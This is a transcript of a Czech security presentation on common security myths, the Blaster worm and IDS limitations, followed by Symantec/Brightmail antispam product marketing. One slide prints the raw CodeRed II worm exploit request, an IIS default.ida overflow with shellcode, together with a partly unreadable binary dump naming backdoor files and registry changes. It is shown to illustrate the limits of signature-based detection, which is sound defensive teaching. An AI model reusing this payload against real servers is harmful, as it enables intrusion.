660 likes | 832 Views
Mýty a reality bezpečnosti. Jaroslav Techl techl@abdist.cz ABAKUS Distribution, a.s. Čeho jsme stále více svědky?. Téměř všechny větší společnosti se ocitají bez perimetru Částečně se jedná o důsledky diverzifikace obchodních aktivit
E N D
Mýty a reality bezpečnosti Jaroslav Techl techl@abdist.cz ABAKUS Distribution, a.s.
Čeho jsme stále více svědky? • Téměř všechny větší společnosti se ocitají bez perimetru • Částečně se jedná o důsledky diverzifikace obchodních aktivit • Masové užívání přenosných počítačů přináší zcela zásadní rizika • Naprostá většina útoků je aplikačních a přichází povolenými porty • Ze zvýšeného „virového šumu“ vyrůstají nebezpečné útoky, realizované pomocí replikujících se červů • Nebezpečné kódy zneuživají zranitelností a hackují sítě zákazníků • Jsou vykrádána citlivá data, která jsou odesílána neznámým příjemcům • Téměř všechny „pokročilé“ červy byly spojeny s trojskou logikou • Dochází k ochromujícím DDoS útokům ne zvenčí, ale zevnitř sítí • Kompromitace zevnitř jsou stále více záměrem vnějších útočníků
Proč se to děje s takovým úspěchem? • Příčinou nejsou jen úspěšní útočníci, ale také neúspěšní obránci, podléhající řadě bezpečnostních mýtů.
1. mýtus – „Technologie rozhoduje“ • Rozhodují lidé! • Zranitelný software tady bude a výrobce to nevyřeší. • Útočníci tady také budou a budou kompetentní. • Zvyšujte tedy svoji kompetenci rychleji. • Základem je znát, ne domnívat se! Myslet, znamená nevědět. • Naprosté většině úspěšných útoků předcházejí nezpozorovaná nebo ignorovaná varování • Přes pokles tempa vzniku nových zranitelností zůstává stále frekvence na úrovni 73/týden (statistika CERT za rok 2003) • Očekávat, že tuto záplavu zvládnou provozně orientovaní správci bez nástrojů je zcela iluzorní a nerealistické • Většina útoků nevyžaduje žádnou nebo jen minimální interakci s uživatelem. Ten jim nezabrání. Proti profesionálovi musí stát profesionál.
2. mýtus – „Vždyť jsou to jen viry!“ • Nejčastěji Vás ohrožují replikující se „kódy – hackeři“ • Napadení typicky přichází po vně povolených portech nebo zevnitř sítě • Jsou atakovány zranitelnosti a standardně otevřené porty nechráněných služeb • Vlastní smtp enginy v těle kódu vedou k anonymnímu vykrádání informací • Souběh skanů a nelegálních smtp transakcí zapříčiňuje DDoS útok zevnitř • Koncový uživatel je čistou obětí, nikoliv „spolupachatelem“ škod • Drtivá většina těchto kódů v sobě obsahuje nebo umožňuje trojskou logiku • Samotné antiviry (bez ohledu na výrobce) často nemohou útoku účinně zabránit
Rozsah napadených platforem • Compaq OpenVMS • Compaq True64 Unix • Cray UNICOS • Entegrity DCE/DCF for Linux, True 64 Unix • Entegrity PC-DCE for Windows • HP Advanced Security for VP HP-UX, Solaris • HP-UX 10.2-11.0 • HP OpenView Operations, VP Manager • IBM DCE Windows, AIX, Solaris • MS Windows 2000 Advanced Server, Data Center, Professional • MS Windows XP Home, Professional
Blaster: Co to bylo? • Červ, který se chová jako naprogramovaný hacker • Spustitelný kód je tajně umístěn do počítače • Dorazí jako deformovaná zpráva přes port 135 (DCOM RPC) • Důvody jeho úspěšnosti • Využití známé zranitelnosti Microsoft RPC. • Shodí službu a vloží deformovanou zprávu do systému • Port 135 je v interních sítích typicky ponecháván otevřený, výsledkem je interní DDoS • Port 135 je používán pro Win management, i v případě osobních firewallů bude často přístupný • Infikovaný stroj serestartuje předtím, než může být zaveden patch • Vzniká plných 27 dní před vyrobením patche
3 .mýtus – „Jsme přece za firewallem“ • Jste si jisti slůvkem „za“? • Značná část vlastních uživatelů pracuje velmi frekventovaně mimo perimetr • Mobilní pracovníci s notebooky, palmy apod. • Absence osobních firewallů (zejména kvůli slabinám v administraci) • Korporativní firewally stojí pouze na připojeních k Internetu • Povolené porty a služby, které jsou vynuceny obchodními činnostmi • Značnou část externích subjektů pouštíme velmi frekventovaně za perimetr • Obchodní partneři, zákazníci, dodavatelé, veřejnost • Servisní pracovníci, vývojáři, testovací práce, pilotní projekty • Outsourcing a diverzifikace činností uvnitř korporací • Proč tedy mnoho těchto útoků přes Váš firewall prošlo? • Část jich propouštíte podle vlastních pravidel (až 80% útoků je aplikačních) • IDS systémy nejsou nasazovány tak, aby prohloubily perimetr směrem dovnitř • To, že se útoky za firewallem projevily, neznamená, že skrze něj přišly
4. mýtus – „IDS – to je, co frčí!“ • Co je to síťové IDS založené na signaturách útoků? • Signaturové IDS je svým mechanismem de facto blízké „packetovému antiviru“ • Vysoká aktualizační zátěž (není signatura, není detekce) • Existuje asi 3000 známých útoků vs. současné IDS jsou schopny uplatnit 600 signatur • Nulová účinnost v nulových dnech vs. simulace účinnosti honbou za známými útoky • Vysoký počet falešných hlášení a snadná možnost zneužití zvenčí • Proč mají výrobci síťových IDS tak malou instalovanou bázi? • Každé reálně nasazené IDS zakládá problém typu „24x7x365“ • Minimální podpora agregací a korelací útoků vs. statisíce izolovaných událostí • Vysoká pracnost odlišení falešných hlášení od skutečných síťových útoků • Finální rozčarování pak vede k tomu, že mnohé systémy končí opět v krabici na skříni • Detekce anomálií v protokolech a provozu, využívající signatur jen doplňkově • Použití výkonných agregačních a korelačních enginů – incidenty
Realita – omezení signaturových systémů • GETdefault.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=aHTTP/1.0 Content-type: text/xmlContent-length: 3379 ネネ `・ フ・dg6 dg・ 鞜 h劫\PU恪・PU・@・燕XU・ 斑= 版ヘカノ燕T丘×0・ ・ ヌF0・ ・ CodeRedII ・$U、Yj劫pPuUーサ タtK3ロU・3' u?ヌ・ ヌ・ ヌ・ 畿怨d劫hPj 劫`Pj jU屠 Th~fuU、Y・u1 X-モ j h・ PuUャ=・ uj j劫\PuUィuUエ鱸サ ゚w・ ・ xuサ `・ 掬$dg・ Xa・dg6 dg・ f・MZu繼K<・PE uラ亀xモ毅・KERNuナ-EL32uサ3ノI脚 Aュ・GetPu|rocAu・JIム・J$キチ・J・テ吋$$dg・ Xaテ鏖云・E LoadLibraryA u・UE CreateThread u・UE GetTickCount u・UE・ Sleep u・UE韋 GetSystemDefaultLangID u・UE蒻 GetSystemDirectoryA u・UE琲 CopyFileA u・UEワ・ GlobalFindAtomA u・UEリ・ GlobalAddAtomA u・UEヤ・ CloseHandle u・UEミ・ _lcreat u・UEフ・ _lwrite u・UEネ・ _lclose u・UEト・ GetSystemTime u・UEタ・ WS2_32.DLL UEシ・ socket uシUEク・ closesocket uシUEエ・ ioctlsocket uシUE、・ connect uシUEー・ select uシUE・ send uシUEャ・ recv uシUEィ・ gethostname uシUE懆 gethostbyname uシUE倩 WSAGetLastError uシU碑 USER32.DLL UE占 ExitWindowsEx u・UE古畿・タ・@右ы・xV4チタテ鞦< t・t竟旗韆韓チ・鞋旗靱韓雍・・ Y・・リ#・リ・t麾鍗t・拗t津h 劫\PU熏シ\・ \CMD.EXE ^・・、ウcj・ d:\inetpub\scripts\root.exe ・$・劫\PUワj・d:\progra~1\common~1\system\MSADC\root.exe ・$・劫\PUワ霄 ・ZP ク @ ・・・ PE L *%) 潤 @ @ 0 ・ ` @ タ 0 @ タ・・・・・・・・・・・・・・・・・・・・・・ h hミ @ 鐶 査ミ @ セ @ ・・・・jhミ @ 鎰 ・ hタ‘ ・ ・hリ$@ h? j h @ h ・ タu&jhT @ jj hH @ 5リ$@ ・ 5リ$@ ・ hリ$@ h? j hX @ h 竟 タuUス・@ 鎰 スィ @ 錚 j hク @ jj hー @ 5リ$@ 雍 j hト @ jj hエ @ 5リ$@ 陌 5リ$@ 陏 テヌミ$@ hミ$@ hミ @ hヤ$@ j U5リ$@ 鐐 タuI。ミ$@タt@セミ @ > t6Ff×,,u217 ・フ @ ・ミ$@ 5ミ$@ hミ @ jj U5リ$@ ・ テ%`0@ %d0@ %h0@ %p0@ %t0@ %x0@ %|0@・・・・・・・・・ \EXPLORER.EXESOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon SFCDisable ・SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots /Scripts /MSADC /C /D c:\,,217 d:\,,217・・・・・・・・・・・・ <0 ・ `0 L0 ・ p0 ・ ヲ0 セ0 ネ0 ワ0 ・ 0 ・ ヲ0 セ0 ネ0 ワ0 ・ 0 KERNEL32.dll ADVAPI32.dll Sleep GetWindowsDirectoryA WinExec RegQueryValueExARegSetValueExA RegOpenKeyExARegCloseKey・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・ ^ソケ j・ d:\explorer.exe ・$・Uフ・tM怨Lャ旗8>u'j ・jVオLUネFOuナオLUトテ珒・・テaノツ
5. mýtus – „Více výrobců = více jistoty!“ • Ani kombinace technologií různých výrobců nemusí být všelékem • Kombinace různých produktů od různých výrobců má své kouzlo (například v případě heuristické kontroly antivirů) • Přináší však řadu úskalí – různá správa, rozdílná aktualizace, občasné konflikty na stejných systémech • Mezníkem je často velikost společnosti – važte proti sobě výhodu různosti a problém neovladatelnosti • Náklady na integraci často překračují náklady na produkty • Základním problémem integrace není to, „aby si produkty navzájem rozuměli“ • Jde o to, aby lidé rozuměli tomu, „co se ve všech těch produktech současně děje“ • Účinnost je založena na informaci, na jejímž základě se rozhodnu a správně konám • Často neplatí, že kombinace „toho nejlepšího“ dává něco „ještě lepšího“
6. mýtus – „Hacker je technický genius“ • Sociální techniky jsou stále velmi účinné a měli by být prověřovány • Technické zranitelnosti svých systémů můžete relativně snadno zjišťovat, už jste někdy zavolali koncovému uživateli • Základní školení bezpečnostních praktik by nemělo být dlouhodobě obcházeno (Enterprise Security Awareness Program) • I nízká kvalifikace může stačit při velké důvěře nebo neomezené příležitosti • Sociálně založený hacking přichází často i zevnitř (rozdílná motivace) • James Bond na střeše nepřistane, stále je jednodušší dát někomu peníze • Snažte se personálními opatřeními snížit fluktuaci klíčových pracovníků • Fluktuace se typicky týká shodných nebo podobných oborů – Vaši lidé přijdou ke konkurenci • Omezujte obtížně kontrolovatelné technologie (plošné přístupy přes ODBC, klíčová data ve sdílených adresářích...)
7. mýtus – „Všichni si rozumíme“ • Sociální techniky jsou stále velmi účinné a měli by být prověřovány • V čem spočívá podstata lidské komunikace a v čem je její problém? • Strana, která „kóduje“ používá jiný klíč, než strana, která „dekóduje“ • Různá úroveň znalostí a kvalifikace • Různé zkušenosti a představy o sdíleném obsahu • Mnoho scénářů úspěšných útoků počítá s tímto faktem !!! • Než se lidé dohodnou, často již není na čem se dohadovat • Fingované útoky proti IDS odvádějící pozornost bezpečnostních specialistů • Kombinované útoky různůmi červy ve stejném čase nebo v těsné souslednosti • Různé projevy téhož na různých úrovních • Jak to vidíme „my od firewallu“ • Helpdesk už má zase problémy s aplikací • Správce něco udělal s přístupy...
Hlavní zásady účinné bezpečnosti • Příčinou nejsou jen úspěšní útočníci, ale také neúspěšní obránci • I bezpečnostní specialisté často redukují bezpečnost na technologii • Zásadně je podceňována hodnota přesných informací a včasných varování • Naprostá většina společnostní používá pouze kombinaci firewall/antivirus • Převážná většina firewallů nepracuje na aplikační vrstvě a není schopna rekonstruovat pakety na vnitřních rozhraních • Základním problémem jsou lidé, jejich informovanost, komunikace, rozhodnutí a akce • Ze zvýšeného „virového šumu“ vyrůstají nebezpečné útoky, realizované pomocí replikujících se červů • Nebezpečné kódy zneuživají zranitelností a hackují sítě zákazníků • Jsou vykrádána citlivá data, která jsou odesílána neznámým příjemcům • Téměř všechny „pokročilé“ červy byly spojeny s trojskou logikou • Dochází k ochromujícím DDoS útokům ne zvenčí, ale zevnitř sítí • Investujte do zhodnocení dat, která již máte a do schopnosti řídit odezvu
Realita v České republice včera • Antivirové záznamy celkem • Antivirové záznamy HTTP/FTP • Provoz na perimetru • Útoky podle typu ne jen AV
Stav spamu – v průměru 66% jsme naměřili v ČR • Průměrné stavy po měsících: • Listopad 2004 52% • Prosinec 2004 71% • Leden 2005 82% • Z toho bylo zamořeno červy: • Listopad 2004 7% z celkového objemu (tj. 3928 zpráv) • Prosinec 2004 3% z celkového objemu (tj. 1981 zpráv) • Leden 2005 1% z celkového objemu (tj. 8 zpráv) (Výsledek za leden je zkreslen tím, že jsme testovali účinnost firewallů před antispamovou bránou.)
Základní pohled na architekturu U zákazníka Na straně Symantec Až 25% pošty v Internetu! Aktualizace od 10 minut
Analýza SPAMu: zkušební síť Základní funkce Jak to pracuje Proč jeto unikátní • Shromažďuje obrovská množství pošty pro spam analýzu • Poskytuje varování přes spam útoky a jinými hrozbami v reálném čase • Doručuje spam a falšovanou poštu do center BLOC, kde je analyzována a zpracována • Agreguje statistiky o celkovém poštovním provozu, dovoluje měřit úrovně spamování • Zákazníci vytvářejí nové adresy, které směrují poštu do center Symantec/Brightmail • Adresy jsou navrhovány tak, aby přitahovaly spammery a jsou široce publikovány • Patentová ochrana: Symantec je držitelem unikátního patenru na spam honey-pot • Globální pokrytí:Zahrnuje adresy od ISP a velkých korporací v Americe, regionu EMEA a APAC • Mimořádný rozsah:Přes 2 milionyklamných mailových adres a domén. Spolu se vzorky spamové pošty od zákazníků kontrolujeme přes 300 milionů poštovních adres
Fitrování dle identity a reputaci Co to je Výhody Výzvy • Identita:Určení domény, IP adresy nebo poštovní adresy odesílatele příchozí zprávy • Reputace:Monitoring chování odesílatele a zdroje pošty s cílem určit poměr mezi legitimní poštou a spamem posílaným z daných adres • Spolehlivost:Každý počítač v Internetu má unikátní IP adresu • Obtížné oklamání:I když spammeři mohou snadno podvrhnout adresu odesílatele (help@citibank.com), nemohou snadno maskovat IP adresu odesílajícího stroje • Problém otevřených relayí:Spammeři mohou používat otevřené relaye, které jsou vlastnictvím odesílatelů legitimní pošty • Kvalita:Seznamy musí být extrémně přesné a často aktualizované, aby se mohly vypořádat se spammery
Služba reputací: první linie obrany Jak to pracuje Reputation Service Dostupné seznamy • Symantec trvale analyzuje reputaci IP adres, které odesílají poštu • Symantec/Brightmail Scanner se rozhoduje buď v úplné nebo částečné závislosti na reputaciIP adresy odesílatele • Služba plně integrována do Symantec /Brightmail Anti-Spam • Seznam otevřených proxy:zahrnuje stroje infikované nebezpečným kódem • Seznam podezřelých:včetněstrojů, jejichž pošta je vysoce spammová • Seznam bezpečných:zahrnuje stroje, které neodesílalyspam
Filtrování podle reputace: výhoda pro zákazníka Přesnost Automatizace Flexibilita a rychlost • Patentovaná testovací síť proaktivně odhaluje otevřené proxy • Ignoruje otevřené relaye, snižuje pravděpodobnost falešných detekcí • Filtruje individuální servery, ne farmy • Každou hodinu je vytvářen kompletně nový seznam • Centra BLOC automaticky verifikují, zda jsou IP adresy otevřenými proxy • Nové seznamy jsou každou hodinu automaticky znovu aktualizovány • Nasazení je možné kdykoliv (restrikce nejsou omezeny pouze na poštovní gatewaye) • Jediné řešení s aktualizovanými filtry na bázi reputace • Nesrovnatelně vyšší přesnost a 2x vyšší výkonnost oproti standardním DNS lookup metodám
URL odkazy ve spamových zprávách Hrozba Odezva • Spammeři ve zvýšené míře užívají URL odkazy v poště • 90% spamové pošty obsahuje URL odkaz, který může uživatel použít • Proč? • Spam URL Filtry • BLOC extrahuje v testovací síti URL od spamu • BLOC vytváří seznam URL od spammerů • URL odkazy jsou testovány, aby se zjistilo, zda je za nimi webový server spammerů • URL odkazy jsou stahovány do scannerů na straně zákazníka • E-mail se spam URL je blokován Spammeři vydělávají velké peníze generováním webového provozu nebo vybízením uživatelů k nákupům
Spam URL Filtry: výhoda pro zákazníka Trvalá aktualizace Flexibilita a rychlost Účinnost • Práce v reálném čase s dynamickými daty z testovací sítě – žádné „zatuchlé“ seznamy s filtry • Přes 20.000 aktivních URL odkazů v seznamu • Nové URL filtry jsou nasazovány každou hodinu • Detekce falšovaných URL odkazů • Rychlá kontrola shody u jednoduchých URL • Pokročilá, heuristická analýza URL shody • Zvláště efektivní proti URL odkazům typu „mailto:“ • Jen samotný spam URL filtr zachycuje přes 70% spamové pošty • Vysoce účinné proti širokému rozsahu spamových zpráv
Technologie antispamových signatur Hash na zprávě BrightSig2 Signatury příloh • První generace technologie signatur • MD5 hash na těle zprávy • Zachycuje všechny identické zprávy, mající shodný MD5 hash • Patentované signatury pro zachycení “nejasných” shodností s tělem zprávy • Identifikují mutace a náhodná generování používaná spammery k obejití filtrů • Zachycují specifické útoky (a jejich variace) přímo ve fázi jejich rozvoje • Třetí generace technologie signatur • Extrahuje přesné signatury MIME obsahu (např. pornografické obrázky, klamnou grafiku nebo i červy) • Filtruje spam přílohy, současně povoluje průchod legitimním přílohám
Taktika spammerů: obejití filtrů falšováním HTML kódu • Jednoduchý způsob, kterýmmůže spammerzařídit náhodné generování obsahu zpráv • Zprávy s HTML mutacemi jsou velmi obtížnězachytitelné filtry
BrightSig2: Boj proti mutovaným spamům Předem blokuje náhodně generované zprávy, které jsou mutacemi původního spam útoku
Heuristické filtrování • Hledá víceré vlastnosti spamu • Každá vlastnost „získává“ určitý počet bodů • Body se postupně sčítají • Je-li dosaženo SPAM skóre, je zpráva blokována • Výhody • Dobré pro boj se zcelanovými spam záplavami • Nevýhody • Detekce může být delší • Spammeři zprávy často testují proti některým heuristickým enginům ještě předtím, než záplavu spustí • Heuristiky musí být „trénovány“, aby zachytily spam (často za cenu zvýšení počtu falešně blokovaných zpráv)
Heuristickéfiltrování: přednosti Symantecu • Z podstaty věci samé je většina heuristik konkurentů kompromisem mezi účinností, přesností a výkonností Přesnost a rychlost Žádné „trénování“ • Heuristika není naší primární antispamovou technologií, ale je pouze doplňkem • Je použita až při neúčinnosti všech jiných filtrů • Je proto navržena pro 5-10% celkové účinnosti systému • Používá kompilovaný kód, který je 2-4x rychlejší než kód interpretovaný • Heuristika je automaticky trénována centry BLOC na straněSymantecu, a tos využitím testovací sítě a legitimní pošty • Administrativní zátěž je dále snižována pomocí automatické aktualizace
Filtrování na bázi jazyka • Okolo 10% spamové pošty je v jiném než anglickém jazyku • Symantec umí zákazníka chránit před ne-anglickým spamem Technologie filtrování Expertíza / zdroje • Jazykově agnostická– technologie filtrování • Jazykově specifická – heuristika • Zeměpisně založené – filtrování reputace • Language ID pro velkou skupinu jazyků • Filtrování jazyka “per user“ • Globální pokrytí BLOC • US • EMEA • APAC • Jazykové schopnosti analytiků BLOC (plynně hovoří většinou světově používaných jazyků – dokonce i česky a slovensky)
Nebezpečný obsah: další velká hrozba • Antivirová detekce na bázi Symantec Scan Engine • Detekuje viry a červy ve zprávách a jejich přílohách • Červy jsou ze zpráv automaticky vymazávány • Antivirové definice jsou aktualizovány společně s antispamovými pravidly • K dispozici je oddělené i dodatečné licencování
Zákaznické filtry: silný doplněk • Umožňují správcům, aby filtrovaly jiné, než spamové zprávy • Vytvoření gobálních, na serverech založených filtrů pomocíeditoru Custom Filters • Víceré podmínky a skanovací kritéria: • IP Addresy • Odesílatel, příjemce, From, To, CC • Pole záhlaví • Tělo • Velikost • MIME záhlaví • Volitelné akce se zprávami
Symantec/Brightmail Control Center • Webové rozhraní pro: • Centralizovanou správu • Tlačná nastavení • Získávání logů • Webovákaranténa • Rozhraní admina • Rozhraní uživatele • Monitoring • Summární přehled • Stav „per- machine“ • Logy • Statistiky a reporty
Globální správa a okamžitý celkový přehled • Centralizovaná správa vícenásobných serverů • Statistikylogů za jednotlivé nebo agregované skanery • Konsolidované reportyza všechny skanery